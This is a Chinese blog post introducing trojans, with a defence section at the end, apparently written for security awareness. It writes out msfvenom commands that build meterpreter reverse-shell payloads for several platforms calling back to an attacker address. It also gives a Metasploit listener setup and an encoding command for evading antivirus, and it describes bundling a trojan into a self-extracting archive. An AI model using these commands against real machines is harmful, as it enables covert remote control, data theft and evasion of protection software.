浅谈木马

简介: 浅谈木马

浅谈木马远控
在听过某网安教育关于浅谈的公开课后,结合本人学过的东西,以及自己实践过的经历。在此分享下木马对我们的影响。

环境:

攻击者:kali

目标主机:Windows

一、了解木马

1.木马,又称为特洛伊木马

特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。古希腊围攻特洛伊许久却无法攻下,于是有人想到了个办法。制作了一个很高很大的木马作为战神马,内部可装士兵,佯攻几天后装作无功而返,留下木马。特洛伊解围后认为自己胜利了,还看到了敌人留下的木马,便作为战利品收入城中,全城举杯庆祝。到了午夜时分,藏匿于木马中的士兵便打开了城门,四处纵火,城外伏兵涌入,很容易便得到了城池。 在如今,我们常将寄宿在计算机中的未授权的远程控制程序称为特洛伊木马。它可以计算机管理员未发觉的情况下执行命令、泄露用于信息、甚至可以窃取管理员用户权限。如今已成为黑客常用的工具之一。

2.木马原理、结构

原理:特洛伊木马是一道程序,藏匿于计算机中,通过对开启计算机的某一端口进行监听,在接受到数据后进行识别,再对计算机执行相应的操作。

其本质是占用一个端口与攻击者进行通信的网络程序。

结构:

(1)客户端

客户端程序

客户端程序是攻击者的控制台,它负责远程遥控指挥。

(2)服务器端

服务器端程序

服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。

二、制作简易木马

此处我们利用msfvenom制作木马程序。

Windows木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f exe -o muma.exe

-p 载荷(payload),用于反弹shell

lhost= 这里写的是攻击者的IP

lport= 这里写的是攻击者主机上用于监听的端口(任意未被占用的端口)

-f 文件类型

-o 输出的文件名

Linux木马

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f elf -o muma.elf

android木马

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -o muma.apk

php木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.php

python木马

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.py

利用msfvenom制作木马时,选择payload和文件类型需要注意。

三、木马的危害

由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。

这里我们直接将制作好的木马放在一个Windows主机中(网络互通),然后在客户端(攻击者)利用msfconsole开启监听

msfconsole

use exploit/multi/handler #进入监听模块

set payload windows/meterpreter/reverse_tcp #加载payload模块

set lhost 本机IP

set lport 4444

exploit/run

开启监听后,我们在目标主机上运行一下木马程序。

此时我们可以看到已经连接上了木马程序。

当我们的电脑被木马控制后,我们电脑中的信息可能会被泄露,包括系统信息、用户存储在电脑上的数据信息等。

除过电脑上的信息可能会被攻击者窃取,攻击者还可能控制电脑对数据进行删改,可以上传和下载文件,盗取计算机中的密码等操作。甚至可以以感染了木马的主机为跳板,攻击该网络下的其他主机等操作。

可能到了这里有人会觉得这些木马很简单,很容易就被目标发现。

攻击者想要在不被发现的情况下在目标主机上种下木马,可以进行木马捆绑、免杀、伪装等操作。

木马捆绑:

制作自解压木马(准备一个木马、一个图片、一个压缩软件即可)

攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序,从而被控制。(当你从一些奇怪的地方下载了一些奇怪的压缩包的时候,可能这个压缩包里面就捆绑了木马,当你一解压,它会自动运行里面的木马程序。)

可能很多时候我们的杀毒软件够强大,可以检测到捆绑了木马的压缩文件。然而攻击者还有方法。

木马免杀:

攻击者可以对木马程序进行一些免杀操作,从而绕过一些防护软件。

常用到的免杀方法有:编码加密、加壳(压缩算法)、利用一些工具进行免杀等。

在利用msfvenom制作木马时,可以使用-e x86/shikata_ganai参数进行加密。

Msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ganai -i 30 -b ’\x00’ lhost=hackIP lport=4444 -f exe -o muma.exe

-e 编码的方式 -i 编码次数 -b不使用十六进制00

一些其他的编码方式,可以使用msfvenom -l encoders命令查看

四、木马防护

1.木马的传播途径

(1)利用下载进行传播

(2)利用系统漏洞传播

(3)利用邮件传播

(4)利用即使通信传播

(5)利用网页传播

(6)利用蠕虫病毒传播等

2.木马的防范与查杀

(1)首先安装杀毒软件

(2)不执行奇怪的软件,使用的软件尽量从官方下载安装

(3)不随便打开奇怪的邮件

(4)尽量少使用或者不使用共享文件夹

(5)不点击奇怪的链接等

本文只是简单讨论下木马远控,为了提高自己和身边亲友的安全意识,后期会有对木马的深入探讨。本文可能会有很多遗漏的地方和不对的地方,欢迎各位大佬指点,文中很多是个人观点,也欢迎各位朋友发表自己的观点看法。

目录
相关文章
|
6月前
|
安全 数据安全/隐私保护
webshell后门分析
webshell后门分析
97 3
|
安全 Linux PHP
浅谈木马
浅谈木马远控 在听过某网安教育关于浅谈的公开课后,结合本人学过的东西,以及自己实践过的经历。在此分享下木马对我们的影响。
|
安全 JavaScript 前端开发
网站总是被上传漏洞上传了木马后门被入侵怎么办
SINE安全又带上业务逻辑漏洞来跟大家做分享了,这一次的主题内容是上传文件漏洞。许许多多企业网站都准许客户自己图片上传、电子版资料,假如上传功能并没有搞好安全防护对策,就存有极大的安全隐患。假如网站应用领域在上传文件流程中并没有对文档的安全性能采取合理的校检,攻击者能够根据上传webshell等恶意文档对php服务器攻击,这样的情况下指出操作系统存有上传文件漏洞。下列是我汇总的一小部分上传漏洞的情景,假如你拥有掌握其他上传避过姿势还可以和我们讨论讨论。
223 0
网站总是被上传漏洞上传了木马后门被入侵怎么办
|
安全 JavaScript 前端开发
木马生成
木马生成
|
安全 网络安全 PHP
WebShell是什么?如何抵御WebShell?
WebShell是什么?如何抵御WebShell?
|
开发框架 安全 Java
网站后门木马查杀该怎么删除
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。
371 0
网站后门木马查杀该怎么删除
|
监控 安全 程序员
服务器里如何查杀网站后门文件
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。
3875 0
|
安全 NoSQL Redis
阿里云查杀恶意木马2t3ik.p
一次杀病毒经历 阿里云控制台查看恶意木马2t3ik.p image.png image.png top 查看2t3ik.p进程cpu占用很高 杀掉进程后依然启动 这种情况一般是应用有定时任务或有守护进程 image.
1217 0